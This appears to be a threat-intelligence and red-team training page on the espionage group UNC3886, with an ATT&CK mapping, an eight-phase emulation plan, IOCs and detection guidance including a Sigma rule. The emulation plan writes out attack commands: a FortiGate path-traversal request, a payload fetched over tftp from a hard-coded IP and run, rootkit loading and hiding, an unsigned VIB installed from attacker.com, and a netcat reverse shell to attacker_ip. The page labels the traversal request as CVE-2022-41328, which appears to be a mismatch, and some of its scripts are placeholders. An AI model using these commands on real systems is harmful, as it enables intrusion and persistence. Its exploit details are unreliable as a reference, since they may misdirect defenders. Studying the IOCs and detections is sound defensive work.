Top Cyber Threats in 2025: Tracking APT Groups Like UNC3886

A Realistic Adversary Simulation Based on Mandiant & Google Cloud's Findings

Overview MITRE TTPs Red Team Plan IOCs Detection

📌 Who is UNC3886?

UNC3886 is a suspected Chinese state-sponsored cyber espionage group uncovered by Mandiant and Google Cloud. The actor specializes in stealthy, long-term compromise of high-value network infrastructure, including:

• Fortinet FortiGate firewalls (CVE-2022-41328)
• Juniper JunOS routers (CVE-2025-21590)
• VMware ESXi hypervisors (CVE-2023-20867)
• vCenter servers and TACACS+ authentication systems

UNC3886 uses zero-day exploits, custom malware (CASTLETAP, RIFLESPINE, VIRTUALPIE), rootkits (REPTILE, MEDUSA), and dead-drop C2 to maintain persistent access while evading detection.

APT Group Espionage Zero-Day Exploitation VMware ESXi Fortinet Juniper Google Drive C2 Rootkit

🛠️ MITRE ATT&CK Mapping

Tactic	Technique	Description
Resource Development	T1583.003	Use VPS from Alibaba, Vultr, HKBN, Ucloud
	T1584.008	Target FortiGate, Juniper, vCenter devices
	T1587.003	Create TLS certificates mimicking victim org
	T1587.004	Develop exploits for VMware/Fortinet zero-days
Initial Access	T1190	Exploit CVE-2022-41328 (Fortinet), CVE-2025-21590 (Juniper)
	T1078	Use valid credentials via SSH/TACACS+
	T1133	Access remote services (VPN, SSH)
Execution	T1059.001	PowerShell: MiniDump LSASS memory
	T1059.003	Windows Command Shell via RIFLESPINE
	T1059.004	Unix Shell (bash/csh) via TINYSHELL
	T1059.006	Python scripts (VIRTUALPIE, pall.py)
	T1129	Shared modules (VMCI interface)
	T1675	ESXi Guest Operations API abuse
	T1218.011	rundll32.exe + comsvcs.dll → LSASS dump
Persistence	T1037.004	Modify /etc/init.d/localnet to run /bin/support
	T1505.006	Deploy malicious VIBs on ESXi (VIRTUALPITA/VIRTUALPIE)
	T1543.002	Symlink /bin/sysctl → backdoored lspci
	T1554	Backdoor SSH/tac_plus daemons to log credentials
	T1098	Exploit CVE-2023-20867 to disable guest auth checks
Defense Evasion	T1014	Deploy REPTILE/MEDUSA rootkits
	T1027.013	Base64 encode payload (ldb.b64)
	T1027.015	Compress payload into trace logs
	T1055	Process injection into cat (CVE-2025-21590)
	T1070.006	Timestomp VIB installation time
	T1140	XOR decode ICMP activation string daily
	T1562.001	Disable signature checks via smit patch
	T1564	Hide REPTILE process/files using LKM
	T1572	TLS tunneling with stolen certs
	T1573.001	RC4/AES/ChaCha20 encrypted traffic
Credential Access	T1003.001	Dump LSASS memory via rundll32
	T1040	Sniff TACACS+ with LOOKOVER
	T1056.001	Keylogging via MEDUSA
	T1555	Steal vpxuser creds from vPostgreSQL
Lateral Movement	T1021.004	SSH from FortiGate to ESXi
	T1563.001	SSH session hijacking via MEDUSA
Command & Control	T1102	Google Drive C2 (RIFLESPINE)
	T1102.001	Dead drop resolver (cyberponke.github.io)
	T1090	SOCKS proxy via TINYSHELL appid
	T1205.001	ICMP port knocking (CASTLETAP)
	T1573.001	Symmetric encryption (AES/RC4/ChaCha20)
	T1572	Protocol tunneling with TLS
Collection	T1005	Collect data from local system
	T1074.001	Stage data using makecab
	T1560.001	Archive via utility (ZIP, CAB)
Impact	T1491	Defacement simulation

🔴 Realistic Red Team Emulation Plan

🎯 Phase 1: Resource Development

Set up infrastructure mimicking UNC3886's C2 setup.

# Acquire VPS from Alibaba/Vultr (Singapore/HK)
ssh root@vps-alibaba-sg

# Deploy dead-drop resolver
git clone https://github.com/cyberponke/config.git /var/www/html/
echo "185.199.108.153 c2-drops.net" > config/index.txt
    

🔓 Phase 2: Initial Access

Exploit CVE-2022-41328 on FortiGate.

POST /remote/fgt_lang?lang=/../../../..//////////bin/ps HTTP/1.1
Host: firewall.corp.com:443

# Download payload
tftp -g -r /malicious.bin -l /bin/fgfm 47.252.20.90
chmod +x /bin/fgfm && nohup /bin/fgfm &
    

🛡️ Phase 3: Defense Evasion

Deploy REPTILE with TLS and hide artifacts.

# Load kernel module with TLS
insmod reptile.ko pass=secret port=1337 ssl=1 cert=/etc/cert.pem key=/etc/key.pem

# Hide process and file
echo "hide_process REPTILE.SHELL" > /proc/reptile/cmd
echo "hide_file /bin/fgfm" >> /proc/reptile/cmd
    

🔐 Phase 4: Persistence & Privilege Escalation

Install malicious VIB on ESXi.

# Bypass signature check
esxcli software acceptance set --level=PartnerSupported

# Install VIB
esxcli software vib install -f --no-sig-check -v http://attacker.com/VIRTUALPITA.vib

# Exploit CVE-2023-20867 via pall.py
python3 pall.py --target 10.1.1.100 --cmd "nc attacker_ip 4444 -e /bin/sh"
    

🔁 Phase 5: Lateral Movement

Movement via SSH and credential reuse.

# Pivot from FortiGate to ESXi
ssh root@esxi-host -J admin@fortigate

# Use stolen vpxuser to access VMs
vim-cmd vmsvc/getallvms
    

📡 Phase 6: Command & Control

Use Google Drive and dead drops.

# RIFLESPINE-like Google Drive polling
python3 -c "
import drive; task = drive.get('task.enc'); cmd = decrypt(task); output = run(cmd); drive.upload('resp.enc', encrypt(output))
"

# Dead drop resolver (MOPSLED)
curl https://cyberponke.github.io/config | chacha20-decrypt key > c2.txt
    

📦 Phase 7: Collection & Exfiltration

Stage and compress data.

# Stage files
copy C:\Users\*.kdbx C:\Staging\

# Compress using Windows tool
makecab /F files.inf archive.cab
    

💥 Phase 8: Impact Simulation

Simulate defacement (non-destructive).

echo "System Under Maintenance" > /var/www/html/index.html
    

🚨 Indicators of Compromise (IOCs)

File Paths:
/bin/fgfm, /var/tmp/.castletap, /etc/init.d/localnet,
/var/log/tacucs.log, /lib/modules/*/reptile.ko,
/var/log/ldapd*.gz, /usr/sbin/auditd*

Network Artifacts:
POST /remote/fgt_lang?lang=..., GET cyberponke.github.io/config,
UDP/TCP on ports 2233, 1337, 22000+

C2 Domains/IPs:
cyberponke.github.io, secure-update.net, 47.252.20.90

Malware Signatures:
CASTLETAP (ICMP magic: "CASTLETA"), RIFLESPINE (Google Drive sync),
VIRTUALPIE (Python-based ESXi backdoor), REPTILE (LKM rootkit)

🔍 Detection & Hunting Recommendations

• Monitor for rundll32.exe C:\windows\System32\comsvcs.dll MiniDump
• Detect unexpected VIB installations on ESXi hosts
• Alert on Base64-encoded files written to Juniper shell (ldb.b64)
• Inspect ICMP packets for XOR-encoded strings (daily rotating key)
• Log modifications to /etc/init.d/ and systemd units
• Baseline SSH activity and flag session hijacking patterns
• Hunt for processes loading unknown kernel modules (insmod reptile.ko)
• Check for modified /bin/smit or tac_plus binaries

Example Sigma Rule (YAML)

title: Suspicious rundll32 LSASS Dump
id: 9a3b5c1e-1234-4abc-9876-abcdef123456
status: experimental
description: Detects rundll32.exe abusing comsvcs.dll to dump LSASS
author: RedTeam Lab
date: 2025/04/05
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\rundll32.exe'
        CommandLine|contains: 
            - 'comsvcs.dll MiniDump'
            - 'C:\windows\Temp'
    condition: selection
level: high
    

📚 References

• Mandiant: UNC3886 Profile
• Google Cloud: Cloaked and Covert
• MITRE ATT&CK: UNC3886 (G0137)
• Ghost in the Router: Juniper Targeting

Note: This document is for educational and red team training purposes only. All activities must be authorized under strict rules of engagement.

© 2025 Threat Intelligence & Red Team Lab
Based on public reporting from Mandiant and Google Cloud.
Do not use without proper authorization.